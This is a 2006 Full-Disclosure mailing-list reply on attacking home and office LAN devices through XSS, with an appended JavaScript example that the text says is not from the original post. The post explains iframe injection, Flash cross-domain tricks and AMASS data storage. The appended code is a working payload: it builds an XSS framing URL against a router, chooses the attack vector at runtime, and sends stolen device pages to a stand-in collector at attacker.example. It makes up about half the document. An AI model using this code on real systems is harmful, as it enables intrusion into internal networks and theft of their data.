Re: [Full-disclosure] Attacking the local LAN via XSS

In most cases JavaScript is required. Flash 7 has the flexibility to
perform cross domain requests, however this is fixed in Flash 8. Java
Objects are quite the same in that respect. Of course, in certain
situations it might be possible to trick the browser.

The proposed scenario takes advantage of the fact that the internal device
is vulnerable to an XSS attack. In this case all the attacker needs to do
is to make an iframe call to the vulnerable URL in order to inject
JavaScript code within the device domain. When this is achieved the
browser will happily allow you to make XmlHttpRequests. In the Ajax
world this is the most well proven technology. Both POST and GET are

Performing PUT, HEAD, DELETE and other server methods is possible as
well. All the attacker needs to do is to perform an iframe call to the
XSS-vulnerable URL that will embed a Java Object which will perform
the desired operations. More sophisticated attack vectors are also
possible (tcp, udp, icmp scanning, sockets, etc...).

In case the current browser has an outdated Flash plugin, the malicious
site can perform the desired attack without the need for the internal
device to be vulnerable to XSS. However this will work in very closed
environments because most of the time plugin updates are enforced on a
regular basis.

In case sensitive information needs to be transferred from the local
LAN to a remote collection point a few other methods can be employed.
A Flash object can store a lot of information by using the AJAX
MAssive Storage System (AMASS) technique
<>. When the
storage reaches a critical mass (99K) the content can be automatically
dumped at the remote collection point via POST. All this can be
achieved from Flash (all versions). Of course the remote collection
point needs to have a "crossdomain.xml" file located in the document
root to allow cross domain requests in case the Flash plugin is in its
latest version.

All of these checks can be performed at runtime. The attacker can
detect what version of Flash is currently used and whether Java is
enabled. Based on that, the best attack vector will be selected.
Moreover, this can be trivially achieved by using well known AJAX
based libraries.

On 8/4/06, Georgi Guninski <guninski@xxxxxxxxxxxx> wrote:
On Fri, Aug 04, 2006 at 12:35:48AM +0100, pdp (architect) wrote:
> For that purpose three prerequisites are needed:
> 1. page that is controlled by the attacker, let's call it
> 2. border router vulnerable to XSS

do you need javascript in all cases? unless you badly need http POST, doing
blind <img src=http://ip/cgi-bin/readmailreallyfast>, iframe src=, may have
interesting side effects.

where do you want bill gates to go today?


pdp (architect)

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -
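The following is an added example illustrating the scenario in the message above (framing an XSS-vulnerable device URL so that script runs in the device's origin, picking the vector at runtime from the Flash version, and accumulating harvested data until it reaches the dump threshold). It is not code from the original post or from its author. The device address, the vulnerable path and parameter, and the collector URL are all hypothetical stand-ins; the device-side script uses a plain HTML form submission to get data out of the device origin, since a cross-domain XmlHttpRequest would be refused there, and the AMASS-style buffer takes an injected sender so it can be exercised outside a browser.

```javascript
// Added example, not code from the original post. Every address, path and
// parameter below is a hypothetical stand-in for "the internal device".
const DEVICE_ORIGIN = "http://192.168.1.1";          // assumed border-router address
const XSS_PATH = "/cgi-bin/status";                   // assumed page reflecting a parameter unescaped
const XSS_PARAM = "q";                                // assumed reflected parameter
const COLLECTOR = "http://attacker.example/collect";  // assumed remote collection point
const CRITICAL_MASS = 99 * 1024;                      // the post's ~99K dump threshold

// Script that runs inside the device's origin once the iframe has loaded the
// reflected-XSS URL. A same-origin XHR is allowed there, and a plain HTML form
// POST to the collector is not blocked by the same-origin policy (a cross-domain
// XHR would be), which is how the fetched page gets out without Flash.
function deviceSidePayload(targetPath, collector) {
  return [
    "var x=new XMLHttpRequest();",
    "x.open('GET','" + targetPath + "',true);",
    "x.onreadystatechange=function(){",
    "if(x.readyState!=4)return;",
    "var f=document.createElement('form');",
    "f.method='POST';f.action='" + collector + "';",
    "var i=document.createElement('input');",
    "i.type='hidden';i.name='d';i.value=x.responseText;",
    "f.appendChild(i);document.body.appendChild(f);f.submit();",
    "};x.send(null);"
  ].join("");
}

// URL the attacker's page puts in <iframe src=...>: the vulnerable endpoint
// with the payload reflected as a <script> block. The payload is URL-encoded,
// so the finished URL contains no raw angle brackets.
function buildFramingUrl(targetPath, collector) {
  var injected = "<script>" + deviceSidePayload(targetPath, collector) + "</script>";
  return DEVICE_ORIGIN + XSS_PATH + "?" + XSS_PARAM + "=" + encodeURIComponent(injected);
}

// Runtime vector selection as the post describes it: a pre-8 Flash plugin can
// make cross-domain requests by itself; otherwise the device must be
// XSS-vulnerable; failing both, only blind <img src=...> GETs remain.
function chooseVector(flashVersion, deviceHasXss) {
  var major = parseInt(String(flashVersion || "0").split(".")[0], 10) || 0;
  if (major > 0 && major < 8) return "flash-direct";
  if (deviceHasXss) return "iframe-xss";
  return "img-blind";
}

// AMASS-style accumulation: keep harvested data client-side and dump it to the
// collector only once it reaches the critical mass. `send` is injected (in the
// post it is Flash doing the POST) so the buffer can run without a browser.
function ExfilBuffer(threshold, send) {
  this.threshold = threshold;
  this.send = send;
  this.chunks = [];
  this.size = 0;
  this.dumps = 0;
}
// Returns the buffered size after the append (0 if the append triggered a dump).
ExfilBuffer.prototype.append = function (chunk) {
  this.chunks.push(chunk);
  this.size += chunk.length;
  if (this.size >= this.threshold) this.flush();
  return this.size;
};
// Returns true if something was dumped, false if the buffer was empty.
ExfilBuffer.prototype.flush = function () {
  if (this.size === 0) return false;
  this.send(this.chunks.join(""));
  this.chunks = [];
  this.size = 0;
  this.dumps += 1;
  return true;
};

// Usage: build the framing URL for a hypothetical config page and a buffer
// that dumps at the post's threshold.
var framingUrl = buildFramingUrl("/config.htm", COLLECTOR);
var exfil = new ExfilBuffer(CRITICAL_MASS, function (data) { /* POST data to COLLECTOR */ });
```

In the browser the attacker's page would assign framingUrl to an iframe's src; everything from the XHR onward then executes with the device's origin, and the only traffic leaving the LAN is the form POST the device-side script makes to the collector.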
